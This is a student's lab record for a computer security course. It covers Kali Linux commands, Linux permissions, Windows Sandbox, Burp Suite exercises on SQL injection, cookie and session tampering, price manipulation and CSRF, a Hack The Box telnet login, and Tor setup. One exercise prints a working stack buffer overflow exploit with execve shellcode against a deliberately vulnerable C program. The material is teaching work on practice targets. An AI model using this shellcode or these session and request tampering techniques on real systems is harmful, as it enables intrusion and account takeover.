EX.

NO: 1
STUDY EXPERIMENT OF KALI LINUX

DATE:

AIM:
To study about Kali Linux.
DESCRIPTION:
Kali Linux is a Linux distribution that is Debian-derived and is designed for advanced
penetration testing, digital forensics, and security auditing. It is preserved and sponsored by
Offensive Security Ltd. Kali contains quite a few tools that help in performing several
information security responsibilities. Few of these tools are:
• Aircrack-ng
• Burp suite
• Ettercap
• John the Ripper
• Maltego
• Nmap
• OWASP ZAP
• Wireshark
• Hydra
• Reverse Engineering tools
• Foremost
• Volatility
These tools are used for a great many purposes, most of which include exploiting a victim
application or network, carrying out network discovery and scanning a target IP address.

Installation Procedure of Kali Linux

Now that we have seen how Kali Linux can be useful, let us look at the Installation
steps and procedure for Kali Linux.
Installation Necessities
Kali Linux Installation is a simple and stress-free process. We will first need to check
if our computer has compatible hardware. Platforms such as amd64, i386, and ARM support
Kali Linux. The i386 images can be run on systems with more than 4GB RAM.
Installation Prerequisites
• We will require at least 20 GB disk space to install Kali Linux.
• We will need a RAM for systems using i386 and amd64 architectures, with at least 1GB
of RAM, but it is recommended to have 2GB of RAM or more.
• Our system will need to have a CD-DVD Drive support or a USB boot support

Steps to Install Kali Linux

Step 1: Boot Screen
To start the installation, boot the system with either CD or USB, whichever installation
medium we have chosen. We will be greeted with the Kali Linux boot screen. Here we can

HARIHARAN A - 71812201054
 choose either Graphical Install or Text-Mode install. For our example, we will choose the
Graphical install.
Step 2: Select a Language
Select the preferred language on the next screen and click on the Continue button.
Step 3: Select your location
The next step will be specifying our geographic location. We then click on the Continue
button.
Step 4: Configure the Network – Enter Hostname
In this step, the image is copied to our hard disk, our network interfaces are probed, and
then we are prompted to enter a hostname for the system. Click on the continue button after
entering the hostname.
In our example, we have taken “kali” as our hostname.
Step 5: Configure the Network – Enter the Domain Name
Optionally, we can also provide a domain name for our system to be able to use by
default.
Step 6: Setup User Account
In the next step, we will need to provide a username for setting up the user account.
The full name of the user is a reasonable choice for this field.
Step 7: Setup User ID
Based on the username provided in the previous step, a default user ID will be created.
We can change this later from the settings if we like.
Step 8: Configure the Clock
Then, we will set our time zone in this step.
Step 9: Partitioning Method
In this step, the installer will review and analyze our disks and offer us four choices, as
shown in the below screenshot. For our example, we will be using the entire disk, hence we
will choose the first option. The second and third option will require us to configure LVM
(logical volume manager) and the fourth option, Manual, can be used by experienced users for
manual partitioning providing them with more granular configuration options.
Step 10: Partition Disks
After selecting our Partitioning method, we need to select the disk to be partitioned.
Step 11: Partitioning Scheme
Based on our needs, we can either keep all the directories in a single disk or choose to
have distinct partitions for the directories. If we are not sure about the options, it is safest to go
with the option “All files in one partition”.
Step 12: Review Changes
This is the review page, where we can analyze the options we have selected and check
for one last time if all our configuration changes are correct because once we click on Continue,
the installer will get to work and irreversible changes will be made. Here we will have almost
finished our installation, as the major steps are done.
Step 13: Configure the Package Manager
In this step, we will configure network mirrors and we will need to enter proxy
information if any, as needed.
NOTE: Choosing No on this screen, will not allow us to install packages from Kali repositories
Step 14: Install GRUB
In this step, we will be prompted to install GRUB.
Step 15: Kali installation
Finally, we have completed the Kali installation. Click on the Continue button to reboot
the system into Kali installation.

HARIHARAN A - 71812201054
 Basic Kali Linux Commands:
apt-get Search for and install software packages (Debian)
aptitude Search for and install software packages (Debian)
bash GNU Bourne-Again Shell
bg Send to background
cal Display a calendar
cat Concatenate and print (display) the content of files
cd Change Directory
chmod Change access permissions
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
cp Copy one or more files to another location
date Display or change the date time
echo Display message on screen
exec Execute a command
exit Exit the shell
file Determine file type
ftp File Transfer Protocol
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command
history Command History
hostname Print or set system name
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mv Move or rename files or directories
open Open a file in its default application
op Operator access
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pwd Print Working Directory
ssh Secure Shell client (remote login program)
sudo Execute a command as another user
touch Change file timestamps
vi Text Editor
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')

HARIHARAN A - 71812201054
 Examples:
Command: ls
The command “ls” stands for (List Directory Contents), List the contents of the folder,
be it file or folder, from which it runs. The most common options are -a (all files) and -l (long
or details) Tab completion is supported and may be configured with .inputrc
When output to file the files are listed one per line. By default, colour is not used to distinguish
types of files. That is equivalent to using --color=none. Using the --color option without the
optional WHEN argument is equivalent to using --color=always. With --color=auto, color
codes are output only if standard output is connected to a terminal (tty).
Command: lsblk
The “lsblk” stands for (List Block Devices), print block devices by their assigned name
(but not RAM) on the standard output in a tree-like fashion.
he “lsblk -l” command list block devices in „list„ structure (not tree like fashion). Note: lsblk
is very useful and easiest way to know the name of New Usb Device you just plugged in,
especially when you have to deal with disk/blocks in terminal.
Command: sudo
The “sudo” (super user do) command allows a permitted user to execute a command as
the superuser or another user, as specified by the security policy in the sudoers list.
exp: root@Kali:~# sudo add-apt-repository ppa:tualatrix/ppa
Note: sudo allows user to borrow superuser privileged, while a similar command „su„ allows
user to actually log in as superuser. Sudo is safer than su. It is not advised to use sudo or su for
day-to-day normal use, as it can result in serious error if accidentally you did something wrong,
that‟s why a very popular saying in Linux community is: “To err is human, but to really foul
up everything, you need root password.”
Command: mkdir
The “mkdir” (Make directory) command create a new directory with name path.
However is the directory already exists, it will return an error message “cannot create folder,
folder already exists”.
exp: root@Kalitut:~# mkdir Kalitut
Note: Directory can only be created inside the folder, in which the user has write permission.
mkdir: cannot create directory `Kalitut„: File exists (Don‟t confuse with file in the above
output, you might remember what i said at the beginning – In Linux every file, folder, drive,
command, scripts are treated as file).
Command: chmod
The Linux “chmod” command stands for (change file mode bits). chmod changes the
file mode (permission) of each given file, folder, script, etc.. according to mode asked for.
There exist 3 types of permission on a file (folder or anything but to keep things simple we will
be using file).
Read (r)=4
Write(w)=2
Execute(x)=1
So if you want to give only read permission on a file it will be assigned a value of „4„, for write
permission only, a value of „2„ and for execute permission only, a value of „1„ is to be given.
For read and write permission 4+2 = „6„ is to be given, ans so on.
Now permission need to be set for 3 kinds of user and user group. The first is owner, then user
group and finally world.
rwxr-x--x abc.sh
Here the root‟s permission is rwx (read, write and execute).
User group to which it belongs, is r-x (read and execute only, no write permission) and
for world is –x (only execute).

HARIHARAN A - 71812201054
 To change its permission and provide read, write and execute permission to owner, group and
world.
root@Kali:~# chmod 777 abc.sh
only read and write permission to all three.
root@Kalitut:~# chmod 666 abc.sh
read, write and execute to owner and only execute to group and world.
root@Kalitut:~# chmod 711 abc.sh
Note: one of the most important command useful for sysadmin and user both. On a multi-user
environment or on a server, this command comes to rescue, setting wrong permission will either
makes a file inaccessible or provide unauthorized access to someone.
Command: tar
The “tar” command is a Tape Archive is useful in creation of archive, in a number of
file format and their extraction.
root@Kali:~# tar -zxvf abc.tar.gz (Remember 'z' for .tar.gz)
root@Kali:~# tar -jxvf abc.tar.bz2 (Remember 'j' for .tar.bz2)
root@Kali:~# tar -cvf archieve.tar.gz(.bz2) /path/to/folder/abc
Note: A „tar.gz„ means gzipped. „tar.bz2„ is compressed with bzip which uses a better but
slower compression method.
Command: cp
The “copy” stands for (Copy), it copies a file from one location to another location.
root@Kali:~# cp /home/user/Downloads abc.tar.gz /home/user/Desktop (Return 0 when
sucess)
Note: cp is one of the most commonly used command in shell scripting and it can be used with
wildcard characters (Describe in the above block), for customised and desired file copying.
Command: mv
The “mv” command moves a file from one location to another location.
root@Kali:~# mv /home/user/Downloads abc.tar.gz /home/user/Desktop (Return 0 when
sucess)
Note: mv command can be used with wildcard characters. mv should be used with caution, as
moving of system/unauthorised file may lead to security as well as breakdown of system.
Command: pwd
The command “pwd” (print working directory), prints the current working directory
with full path name from terminal.
root@Kali:~# pwd
/home/user/Desktop
Note: This command won‟t be much frequently used in scripting but it is an absolute life saver
for newbie who gets lost in terminal in their early connection with nux. (Linux is most
commonly referred as nux or nix).
Command: cd
Finally, the frequently used “cd” command stands for (change directory), it change the
working directory to execute, copy, move write, read, etc. from terminal itself.
root@Kali:~# cd /home/user/Desktop
server@localhost:~$ pwd
/home/user/Desktop
Note: cd comes to rescue when switching between directories from terminal. “Cd ~” will
change the working directory to user‟s home directory, and is very useful if a user finds himself
lost in terminal. “Cd ” will change the working directory to parent directory (of current working
directory).
RESULT:
Thus, the study on Kali Linux has been completed successfully.

HARIHARAN A - 71812201054
EX.NO: 2
CONTROL HIJACKING ATTACKS: EXPLOITS AND
DEFENSES
DATE:

AIM:
To trigger and exploit a buffer overflow attack against a custom C program.
PROCEDURE:
Step 1:
Create a shell file envexec.sh
nano envexec.sh
Step 2:
Give execution privilege to the shell file created.
chmod +x envexec.sh
Step 3:
Create the vulnerable C file.
nano vuln.c
Step 4:
Compile the code with the following command
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln
Step 5:
Clean the environment and execute the exploit
./envexec.sh /root/vuln $(python ...)
Step 6:
Run GDB to load a program to analyse
(gdb)run vuln.c
Step 7:
Display the debugging symbols.
list
list main(function of the vulnerable code)
Step 8:
Display the assembly code
disas main
Step 9:
To examine the information of the program
info os
info functions
info variables
Step 10:
Run the program with input.
run Hello (any preferred string)
Step 11:
Run the overflow to display segmentation fault
run $(python –c ‘print “\x41” * 508’)
Step 12:
Examine the memory address
x/200x ($esp/rsp -550)

HARIHARAN A - 71812201054
 Step 13:
Confirm overwrite of the basepointer register.
info registers
Step 14:
Run the exploit
run $(python -c 'print "\x90" * 425 +
"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\
x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x
80" + "\xba\xfa\xff\xbf" * 10')

Step 15:
Confirm execution of exploit by checking basepointer register.
info registers

A shellcode is a small piece of code used as the payload in the exploitation of a

software vulnerability. It is called "shellcode" because it typically starts a command shell
from which the attacker can control the compromised machine, but any piece of code that
performs a similar task can be called shellcode.

envexec.sh
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog
"$@"
else
exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
fi
else

HARIHARAN A - 71812201054
 exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Vulnerable Code [vuln.c]

#include <stdio.h>
#include <string.h>

int main (int argc, char** argv)

{
char buffer[500];
strcpy(buffer, argv[1]);

return 0;
}

OUTPUT:

HARIHARAN A - 71812201054
 RESULT:
Thus, the implementation to trigger and exploit a buffer overflow attack against C
program has been completed and executed successfully.

HARIHARAN A - 71812201054
EX.NO: 3
PRINCIPLES OF LEAST PRIVILEGE, ACCESS CONTROL,
AND OPERATING SYSTEM SECURITY
DATE:

AIM:
To work with kali linux commands regarding the users and the privileges
PROCEDURE:

If we see a dash in front of the line that means that it’s a file

If we see a d in front means that it’s actually a directory.

If we see r, w and x mean that it’s read, write and execute. It’s the permission setting that this
particular group has.

HARIHARAN A - 71812201054
 There are three group. The first group is the owner of the file and in the figure above
shows that the owner of the file has full read/write/execute. Next set of three is actually the
permissions for the member of group that own the file. Therefore, this is a group ownership as
opposed to the actual ownership. For the people that are in the group that has access to this file,
they can only read and execute but cannot write to it. As for the last one, this is for just all other
users. Hence, any common user here can actually only read and execute and cannot write to it.
This is important especially when we get in to penetration testing. This is because we are
looking to have full access right so we are going to be looking for that folder that have full
read/write in all the three group.

Typically, we look at our temp folder a lot of times. As in the figure above, temp folder
has full read/write/execute. Then, when we are performing penetration testing and want to
upload some sort of exploit, we might upload into temp folder. This is because in the temp
folder, we can execute those files. However, we could also be looking for other full read/write
execute files where we need to modify them and give us root access to a system. Therefore, it’s
all about insecure configurations
Take Note: if you notice that at the permission part where the last part of it is replaced
with t instead of x.
If the sticky bit is set on a directory, the write permission on the directory is no longer
enough to allow files to be removed. You must additionally own the file or own the
directory to perform such action. The “t” symbol means that the execute permission (x) is
combined with sticky bit.

In that /tmp directory above, anyone can create new files. But because of the sticky bit,
one user cannot delete another user’s files. However, the root still continues to be able to delete
from any directory regardless of permissions.
Another important feature here is change access of files, folders and directory with
command called chmod.
If we create a script, our script are not going to be able to run until it has full access. Thus, how
do we change access in the terminal?

HARIHARAN A - 71812201054
 Here, another file is made with echo command. I will just make the hello.txt file with
the word “hello” in it. When we list all the directory content, the file by default only have
read/write and read access for everybody else.

We can change the access with command chmod. For instance in the figure above,
chmod +x hello.txt means that the execute command is added to all group. Now, you will notice
that the hello.txt file is green color coordination means that it is full read/write.

Another way of changing access with the number feature. The one number that you
really need to know is all seven (777) and seven give you full read/write/execute for the file. So,
this is basically how we change file permissions. You don’t actually need to know about other

HARIHARAN A - 71812201054
 numbers in term of penetration testing. However, when it becomes more in terms of
configuration and securing management of file then you probably need to know about it more.
Another feature is add a new user with command known as add user.

We can adduser with the command sudo adduser combined with name and enter all the
other information. Now, we have a user name called john. How do we confirm that?

We can confirm that by looking into the /etc/passwd file by command cat. At the very
bottom, you can see that we have the user john which we created just now. In this file, it shows
you all the user. However, it doesn’t provide the password anymore but it used to be at a long
time ago. The passwords are now in the shadow file now.

HARIHARAN A - 71812201054
 In this file, you have all this information and it’s actually the hashing format. For
instance, we can use a tool like hash cat to break this down and crack the passwords depending
on your capability and strength of the password.
Another feature is switch user with command su.

We can switch to user john with command su and the password for user john is needed
to switch the user successfully. The command whoami is used to check what user terminal we
are in right now or you can just simply look at the name john@kali.

User john are not able to perform such action as it is not user kali.
Another feature called sudo for escalating privileges.

HARIHARAN A - 71812201054
 The sudo will provide john that access to modify the password information for other
user if we give it to him. It’s called the sudoers file and basically anyone in that sudoers file can
change permission given. If they are sudo user in sudoers the file, then they will able to change
the password. In figure above, john is not in the sudoers file so he cannot perform this action.

In figure above kali is in the sudoers file thus the user is allowed to changed the password
for john. Therefore, if you want other user than root/kali to have file permissions then you need
to have them in the sudoers file. That become useful too in penetration testing because you can
look at the sudoers file if you have access and see what user have sudo privileges.

RESULT:
Thus, the kali linux commands regarding the users and the privileges used for
penetration tesing was successfully studied and executed.

HARIHARAN A - 71812201054
EX.NO: 4
ISOLATION AND SANDBOXING
SANDBOXING THE SYSTEM USING THE SANDBOX TOOL
DATE:

AIM:
To implement isolation and sandboxing using the windows sandbox tool.
PROCEDURE:
Step 1: Go to control panel

Step 2: Open programs to enable sandbox in windows

Step 3: From that, go to programs and features

HARIHARAN A - 71812201054
 Step 4: Click on turn windows features on or off

Step 5: Make sure windows sandbox is enabled

Step 6: Restart the pc to makes changes in system

Step 7: Search for windows sandbox in search bar, there you will find a windows sandbox

HARIHARAN A - 71812201054
 Step 8: Right-click on the desktop and select the Paste option to transfer the executable to do a
test in sandbox.

Step 9: Double-click the installer (.exe) to start the installation

Here step 8 and 9 is used for testing a software are any malicious file on a isolated
container(sandbox).
Step 10: After you're done testing the application, click the X button, on the top-right corner,
and click the OK button to close Sandbox. As you terminate the experience, the virtual machine
and its content will be erased from your device permanently without affecting your device i.e
your main device you use it daily

HARIHARAN A - 71812201054
 This is the way the sandbox play vital role ,to get away from malicious file,trojan,worms etc..
Affected System:

Here, I created a trojan virus and it affect the main system

RESULT:
While using sandbox the data gets erased even if the system is affected by virus. The
only advantage is to keep your admin system virus free from malicious app or software.
Sandbox isolates itself from the admin system.

HARIHARAN A - 71812201054
EX.NO: 5
WEB APPLICATION SECURITY
DETECTION OF SQL INJECTION VULNERABILITY
DATE:

AIM:
To detect SQL injection vulnerabilities using Burp Suite’s web vulnerability scanner.
Procedure detect SQL injection vulnerabilities
The majority of SQL injection vulnerabilities can be found quickly and reliably using
Burp Suite's web vulnerability scanner.
SQL injection can be detected manually by using a systematic set of tests against every entry
point in the application. This typically involves:
• Submitting the single quote character ' and looking for errors or other anomalies.
• Submitting some SQL-specific syntax that evaluates to the base (original) value of the
entry point, and to a different value, and looking for systematic differences in the
resulting application responses.
• Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for
differences in the application's responses.
• Submitting payloads designed to trigger time delays when executed within an SQL
query, and looking for differences in the time taken to respond.
• Submitting OAST payloads designed to trigger an out-of-band network interaction
when executed within an SQL query, and monitoring for any resulting interactions.
Screenshots:
Vulnerability Site

HARIHARAN A - 71812201054
 Non-Vulnerability Site

HARIHARAN A - 71812201054
 RESULT:
Thus, detecting SQL injection vulnerabilities was successfully executed and verified.

HARIHARAN A - 71812201054
EX.NO: 6
WEB SESSION MANAGEMENT
USING BURP SUITE TO HACK COOKIES AND
MANIPULATE SESSIONS
DATE:

AIM:
To perform hacking of cookies and manipulate sessions for web session management.
PROCEDURE:
Step 1: First, ensure that Burp is correctly configured with your browser.
Step 2: With intercept turned off in the Proxy "Intercept" tab, visit the login page of the
application you are testing in your browser.

Step 3: Log in to the application you are testing. You can log in using the credentials user:user.

Step 4: Return to Burp. In the Proxy "Intercept" tab, ensure "Intercept is on".

Step 5: Refresh the page in your browser. The request will be captured by Burp, it can be
viewed in the Proxy "Intercept" tab. Cookies can be viewed in the cookie header.

HARIHARAN A - 71812201054
 Step 7: We now need to investigate and edit each individual cookie. Right click anywhere on
the request and click "Send to Repeater".
Note: You can also send requests to Repeater via the context menu in any location where HTTP
requests are shown, such as the site map or Proxy history.

Step 8: Go to the Repeater tab. The cookies in the request can be edited easily in the "Params"
tab.

Step 9: By removing cookies from the request we can ascertain the function of each cookie.
In this example, if the "username", "uid" and "PHPSESSID" cookies are removed, the session
is ended and the user is logged out of the application.
We can use the Repeater to remove cookies and test the response from the server.
Remove and add cookies using the "Add" and "Remove" buttons and use the "Go" button to
forward requests to the server.

HARIHARAN A - 71812201054
 Step 10: Cookies can be edited in the Request "Params" table. In this example we have altered
the value of the "uid" cookie to 1. Alter the value then click the "Go" button.

Step 11: The response from the server can be viewed in the "Response" panel in Repeater. The
response shows that by altering the "uid" cookie we have logged in to the application as
"admin".

RESULT:
Thus, we have used cookies to manipulate the session and access another account
with elevated privileges.

HARIHARAN A - 71812201054
EX.NO: 7
HTTPS: GOALS AND PITFALLS
MODIFYING HTTP REQUEST WITH BURP SUITE
DATE:

AIM:
To perform hacking of cookies and manipulate sessions for web session management.
PROCEDURE:
Step 1: Access the vulnerable website in Burp's browser. In Burp, go to the Proxy > Intercept
tab and make sure interception is switched off. Launch Burp's browser and use it to visit the
following URL:
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-
client-side-controls
When the page loads, click Access the lab. If prompted, log in to your portswigger.net account.
After a few seconds, you will see your own instance of a fake shopping website.

Step 2: Log in to your shopping account

On the shopping website, click My account and log in using the following credentials:
Username: wiener
Password: peter
Notice that you have just $100 of store credit.
Step 3: Find something to buy Click Home to go back to the home page. Select the option to
view the product details for the Lightweight "l33t" leather jacket.
Step 4: Study the add to cart function. In Burp, go to the Proxy > Intercept tab and switch
interception on. In the browser, add the leather jacket to your cart to intercept theresulting
POST /cart request.

HARIHARAN A - 71812201054
 Note: You may initially see a different request on the Proxy > Intercept tab if the browser is
doing something else in the background. In this case, just click Forward until you see the POST
/cart request as shown in the screenshot above.
Study the intercepted request and notice that there is a parameter in the body called price, which
matches the price of the item in cents.
Step 5: Modify the request. Change the value of the price parameter to 1 and click Forward to
send the modified request to the server.

Switch interception off again so that any subsequent requests can pass through Burp Proxy
uninterrupted.
Step 6: Exploit the vulnerability. In Burp's browser, click the basket icon in the upper-right
corner to view your cart. Notice that the jacket has been added for just one cent.
Note: There is no way to modify the price via the web interface. You were only able to make
this change thanks to Burp Proxy. Click the Place order button to purchase the jacket for an
extremely reasonable price.

RESULT:
Thus, the implementation of modifying HTTP requests with Burp proxy has been
completed and executed.

HARIHARAN A - 71812201054
EX.NO: 8
INTERNET PROTOCOL SECURITY
CONNECT TO THE TARGET'S NETWORK AND KNOW
THE WAY AROUND A TERMINAL USING NMAP
DATE:

AIM:
To connect to the target's network and know the way around a terminal.
PROCEDURE:
First log in to the hack the box website and download the ovpn file. Then open the
terminal in kali linux and type the following command.

sudo openvpn (downloaded .ovpn file from the website)

HARIHARAN A - 71812201054
 Let the configuration script run until you see the Initialization Sequence Completed message
at the very end of the output.

ping {target ip}

When first starting a penetration test or any security evaluation on a target, a primary step is
known as Enumeration. This step consists of documenting the current state of the target to learn
as much as possible about it. After our VPN connection is successfully established, we can ping
the target's IP address to see if our packets reach their destination. You can take the IP address
of your current target from the Starting Point lab's page and paste it into your terminalafter
typing in the ping command as illustrated above.
We can cancel the ping command by pressing the CTRL+C combination on our keyboard,
which will be displayed in the terminal as ^C marked above in green.
sudo nmap –sV {target Ip}

HARIHARAN A - 71812201054
 In order to start the scanning process, we can use the following command with the nmap script.
nmap stands for Network Mapper, and it will send requests to the target's ports in hopes of
receiving a reply, thus determining if the said port is open or not. Following the completion of
the scan, we have identified port 23/tcp in an open state, running the telnet service.
telnet {target ip}

We find out that telnet is an old service used for remote management of other hosts on the
network. Since the target is running this service, it can receive telnet connection requests from
other hosts in the network (such as ourselves). Usually, connection requests through telnet are
configured with username/password combinations for increased security.

HARIHARAN A - 71812201054
 We will need to find some credentials that work to continue since there are no other ports open
on the target that we could explore.
Success! We have logged into the target system. We can now go ahead and take a look around
the directory we landed in using the ls command. There is a possibility we might find what we
are looking for.

Copying the flag and pasting it into the Starting Point lab's page will grant you ownership of
this machine, completing the task.

RESULT:
Thus, the implementation to connect to the target's network and know the way around
a terminal has been completed and executed successfully.

HARIHARAN A - 71812201054
EX.NO: 9
TOR: THE SECOND-GENERATION ONION ROUTER
INSTALLATION AND RUNNING TOR
DATE:

AIM:
To study about the installation and purpose of Tor browser.
PROCEDURE:
When you start Tor Browser, you will see the Connect to Tor window. This offers you
the option to either connect directly to the Tor network, or to configure Tor Browser for your
connection. There's a checkbox which asks whether you always want to get automatically
connected to the Tor network, if this is the case, check the box.
Connect:

In most cases, choosing "Connect" will allow you to connect to the Tor network without
any further configuration.
Once clicked, a status bar will appear, showing Tor's connection progress. If you are on
a relatively fast connection, but this bar seems to get stuck at a certain point, try the 'Connection
Assist' or see the Troubleshooting page for help solving the problem. Or, if you know that your
connection is censored or uses a proxy, you should click on "Tor Network Settings".

HARIHARAN A - 71812201054
 Connection Assist:
If Tor is blocked in your location, trying a bridge may help. Connection Assist can
choose one for you using your location.

If Connection Assist is unable to determine your location or you want to configure your
connection manually instead, you can select your region from the dropdown menu and click
on 'Try a Bridge'

Configure:
Tor Browser will take you through a series of configuration options. The Connection
Assist informs you about the state of your Internet connection and your connection to the Tor
network.

HARIHARAN A - 71812201054
 The first checkbox is 'Quickstart'. If selected, every time you open Tor Browser, it will
try to connect with your previous network settings.

HARIHARAN A - 71812201054
 If you know your connection is censored, or you have tried and failed to connect to the
Tor network and no other solutions have worked, you can configure Tor Browser to use a
pluggable transport. 'Bridges' will display the Circumvention section to configure a pluggable
transport or to connect using Bridges.

Other Options:
If your connection uses a proxy you can configure it by clicking on 'Settings ...' against
'Configure how Tor Browser connects to the Internet'. In most cases, this is not necessary. You
will usually know if you need to select this checkbox because the same settings will be used
for other browsers on your system. If possible, ask your network administrator for guidance. If
your connection does not use a proxy, click "Connect".

RESULT:
Thus, the installation and purpose of Tor browser has been completed and executed
successfully.

HARIHARAN A - 71812201054
 EX.NO: 10
Content Beyond Syllabus
Using Burp to Test for Cross-Site Request Forgery (CSRF)
DATE:

Aim
To Implement Cross-Site Request Forgery(CSRF) using Burp Suite.

Procedure
Cross-site request forgery (CSRF) is an attack which forces an end user to execute unwanted
actions on a web application to which they are currently authenticated.
CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user
that has issued a particular request. Because browsers automatically add cookies to requests
regardless of the request's origin, it may be possible for an attacker to create a malicious web site that
forges a cross-domain request to the vulnerable application.
In this example we will be using Burp's CSRF PoC generator to help us hijack a user's account by
changing their details (the email address associated with the account) on an old, vulnerable version
of "GETBOO".
The version of "GETBOO" we are using is taken from OWASP's Broken Web Application
Project. Find out how to download, install and use this project.

Burp Scanner is able to locate potential CSRF issues.

The Scanner identifies a number of conditions, including when an application relies solely on HTTP
cookies to identify the user, that result in a request being vulnerable to CSRF.

HARIHARAN A - 71812201054
To manually test for CSRF vulnerabilities, first, ensure that Burp is correctly configured with your
browser.
In the Burp Proxy "Intercept" tab, ensure "Intercept is off".
Visit the web application you are testing in your browser.

Ensure you are authenticated to the web application you are testing.
In this example by logging in to the application.
You can log in using the credentials user:user.
Access the page you are testing.

HARIHARAN A - 71812201054
Alter the value in the field/s you wish to change, in this case "Email".
In this example we will add a number to the email.

Return to Burp.
In the Proxy "Intercept" tab, ensure "Intercept is on".

HARIHARAN A - 71812201054
Submit the request so that it is captured by Burp.
In the "Proxy" tab, right click on the raw request to bring up the context menu.
Go to the "Engagement tools" options and click "Generate CSRF PoC".
Note: You can also generate CSRF PoC's via the context menu in any location where HTTP requests
are shown, such as the site map or Proxy history.

In the "CSRF PoC generator" window you should alter the value of the user supplied input.
In this example we will change to "[email protected]".
In the same window, click "Copy HTML".

HARIHARAN A - 71812201054
Open a text editor and paste the copied HTML.
Save the file as a HTML file.

In the Proxy "Intercept" tab, ensure "Intercept is off".

If necessary, log back in to the application.
Initially we will test the attack on the same account.
Open the HTML file in the same browser.

HARIHARAN A - 71812201054
Dependent on the CSRF PoC options you may need to submit the request or it may be submitted
automatically.
In this case we are submitting the request manually.

If the attack has been successful and the account information has been successfully changed, this
serves as an initial check to verify whether the attack is plausible.

HARIHARAN A - 71812201054
Now login to the application using a different account (in this example the admin account for the
application).
Once you are logged in, perform the attack again by opening the file in the same browser.

The attack is successful if the account information in the web application has been altered.
A successful attack shows that the web application is vulnerable to CSRF.

HARIHARAN A - 71812201054
For the attack to fire in a real world environment, the victim needs to access a page under the attacker's
control while authenticated.
In our example web application, a new password can be set for the account using the email address.
In this way an attacker could gain full ownership of the account.

RESULT:
Thus, the implementation of Cross Site Request Forgery has been implemented using
burb suite.

HARIHARAN A - 71812201054